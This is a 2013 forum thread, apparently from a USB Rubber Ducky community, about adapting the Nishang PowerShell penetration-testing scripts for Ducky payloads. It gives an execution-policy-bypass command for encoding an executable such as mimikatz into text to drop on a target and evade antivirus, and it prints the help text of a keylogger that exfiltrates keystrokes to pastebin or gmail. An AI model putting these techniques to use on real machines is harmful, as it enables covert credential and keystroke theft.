[Info] Powershell scripts to convert encoded text to exe vice-versa

[redmeatuk]

Hello all,

Apologies in advance if this is old news to all.

Anyone checked out Nishang ? It's a collection of handy Powershell scripts for penetration testing written by Nikhil Mittal which may come in handy for Ducky payloads -:

https://code.google.com/p/nishang/

http://labofapenetrationtester.blogspot.co.uk/

I had a look at http://nishang.googlecode.com/svn/trunk/ExetoText.ps1 in particular and this uses a technique for encoding binaries to text, demonstrated here -:

http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html

You may need to run the following as administrator to bypass a powershell security policy which may prevent you from creating an executable file

powershell.exe -executionpolicy bypass -file ExetoText.ps1 <payload.exe> <payload.txt>

Where payload.exe is your executable e.g. mimikatz.exe and payload.txt is the encoded version of your exe file.

If you were to place this encoded textfile and http://nishang.googlecode.com/svn/trunk/TexttoExe.ps1 on on your SD card if you're running twinduck firmware etc then you wouldn't need an Internet connection and download the file, you can just run this powershell script to convert the encoded text back to the exe. This may get flagged by AV so your mileage may vary.

DarkOperator also has a nice python script and exe to generate base64 encoded powershell commands too -:

http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html

Cheers

Aaron

Edited July 2, 2013 by redmeatuk

[overwraith]

I think that somebody else suggested nishang also. If I can get some more time on my hands I would love to make ducky payloads using Nishang. The biggest problem is figuring out how all the tools in the project work. Are there any tutorials showing how they work?

[skysploit]

I was playing with Nishang when i came across this post... I cant wait to get this integrated with the simple-ducky.

[overwraith]

I downloaded Nishang, and cant figure out how to get the script's help file to show. I keep typing in the command, and the computer gives me an error. Basically what the error says is that the script file is not in powershell's help file. I don't want it to check powershell's help file though, I want it to check the current working directory. Here is the output:

PS G:\nishang_0.2.7\nishang> Get-Help Keylogger.ps1 -full
Get-Help : Get-Help could not find Keylogger.ps1 in a help file in this session. To download updated help topics type:
"Update-Help". To get help online, search for the help topic in the TechNet library at
http://go.microsoft.com/fwlink/?LinkID=107116.
At line:1 char:1
+ Get-Help Keylogger.ps1 -full
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [Get-Help], HelpNotFoundException
    + FullyQualifiedErrorId : HelpNotFound,Microsoft.PowerShell.Commands.GetHelpCommand

PS G:\nishang_0.2.7\nishang>

[redmeatuk]

overwraith, Not really seen any tutorials for Nishang, there should be some examples on http://labofapenetrationtester.blogspot.com

As for displaying the help for the powershell scripts try placing a .\ before the script it worked for me -:

PS C:\Users\luser\Desktop\nishang> Get-Help .\Keylogger.ps1 -full


NAME
    C:\Users\luser\Desktop\nishang\Keylogger.ps1


SYNOPSIS
    Nishang Payload which logs keys.


SYNTAX
    C:\Users\luser\Desktop\nishang\Keylogger.ps1 [-dev_key] <String> [-username
    ] <String> [-password] <String> [-keyoutoption] <String> [-MagicString] <St
    ring> [-CheckURL] <String> [<CommonParameters>]




DESCRIPTION
    This payload logs a user's keys and writes them to file key.log (I know its
     bad :|) in user's temp directory.
    The keys are than pasted to pastebin|tinypaste|gmail|all as per selection.




PARAMETERS
    -dev_key <String>
        The Unique API key provided by pastebin when you register a free accoun
        t.
        Unused for tinypaste.
        Unused for gmail option.


        Required?                    true
        Position?                    1
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?


    -username <String>
        Username for the pastebin account where data would be pasted.
        Username for the tinypaste account where data would be pasted.
        Username for the gmail account where attachment would be sent as an att
        achment.


        Required?                    true
        Position?                    2
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?


    -password <String>
        Password for the pastebin account where data would be pasted.
        Password for the tinypaste account where data would be pasted.
        Password for the gmail account where data would be sent.


        Required?                    true
        Position?                    3
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?


    -keyoutoption <String>
        The method you want to use for exfitration of data.
        "0" for displaying on console
        "1" for pastebin.
        "2" for gmail
        "3" for tinypaste


        Required?                    true
        Position?                    4
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?


    -MagicString <String>
        The string which when found at CheckURL will stop the keylogger.


        Required?                    true
        Position?                    5
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?


    -CheckURL <String>
        The URL which would contain the MagicString used to stop keylogging.


        Required?                    true
        Position?                    6
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?


    <CommonParameters>
        This cmdlet supports the common parameters: Verbose, Debug,
        ErrorAction, ErrorVariable, WarningAction, WarningVariable,
        OutBuffer and OutVariable. For more information, type,
        "get-help about_commonparameters".


INPUTS


OUTPUTS


    -------------------------- EXAMPLE 1 --------------------------


    PS >.\Keylogger.ps1 3 <dev_key> <username> <pass>




RELATED LINKS
     http://labofapenetrationtester.blogspot.com/
    http://code.google.com/p/nishang

Edited July 6, 2013 by redmeatuk

[overwraith]

I get this output.

PS G:\nishang_0.2.7\nishang> dir


    Directory: G:\nishang_0.2.7\nishang


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         5/21/2013   2:19 PM       4993 Get-WLAN-Keys.ps1
-a---         5/21/2013   2:24 PM       7936 Information_Gather.ps1
-a---        11/21/2012   5:23 AM       5507 Invoke-Medusa.ps1
-a---        11/21/2012   5:22 AM       4306 Invoke-PingSweep.ps1
-a---         5/20/2013  10:02 AM       9328 Keylogger.ps1
-a---         2/20/2013   1:22 PM      14114 Parse_Keys.ps1
-a---         1/19/2013   9:14 PM       7690 Prasadhak.ps1
-a---         2/13/2013   9:48 AM       2157 Remove-Update.ps1
-a---          4/8/2013   2:12 PM    1340496 Run-EXEonRemote.ps1
-a---        11/21/2012   7:46 AM       1056 Speak.ps1
-a---        11/21/2012   7:46 AM       1228 StringToBase64.ps1
-a---        11/21/2012   7:46 AM       1572 TexttoExe.ps1
-a---         5/22/2013   2:10 AM       6171 Time_Execution.ps1
-a---         5/21/2013   2:31 PM      13372 Wait_For_Command.ps1
-a---        11/21/2012   7:44 AM       1994 Base64ToString.ps1
-a---        11/21/2012   7:44 AM       1327 Browse_Accept_Applet.ps1
-a---         6/10/2013   3:37 AM       2386 CHANGELOG.txt
-a---          5/1/2013   3:35 AM      12712 Check-VM.ps1
-a---          4/8/2013   8:47 AM       3297 Create-MultipleSessions.ps1
-a---         5/21/2013   2:19 PM      11890 Credentials.ps1
-a---         5/23/2013   3:56 AM      19208 DNS_TXT_Pwnage.ps1
-a---         6/10/2013   3:55 AM        849 Download-Execute-PS.ps1
-a---          5/1/2013   3:33 AM        755 Download.ps1
-a---         1/27/2013  10:38 PM       1800 Download_Execute.ps1
-a---         1/31/2013  10:45 PM       5511 Enable-DuplicateToken.ps1
-a---        11/27/2012  12:14 PM       3869 Execute-Command-MSSQL.ps1
-a---        11/21/2012   7:45 AM       1524 ExetoText.ps1
-a---         5/22/2013   3:22 AM      13069 Get-LSASecret.ps1
-a---         5/22/2013   5:36 AM      22648 Get-PassHashes.ps1
-a---         5/22/2013   9:20 AM        709 README.txt


PS G:\nishang_0.2.7\nishang> Get-Help .\Keylogger.ps1 -full
Get-Help : Get-Help could not find .\Keylogger.ps1 in a help file in this session. To download updated help topics
type: "Update-Help". To get help online, search for the help topic in the TechNet library at
http://go.microsoft.com/fwlink/?LinkID=107116.
At line:1 char:1
+ Get-Help .\Keylogger.ps1 -full
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [Get-Help], HelpNotFoundException
    + FullyQualifiedErrorId : HelpNotFound,Microsoft.PowerShell.Commands.GetHelpCommand

PS G:\nishang_0.2.7\nishang> 

I haven't coded a day of powershell in my life though, so this is to be expected.

[no42]

If you like Nishang, you will also like : https://github.com/clymb3r/PowerShell/tree/master/Invoke-NinjaCopy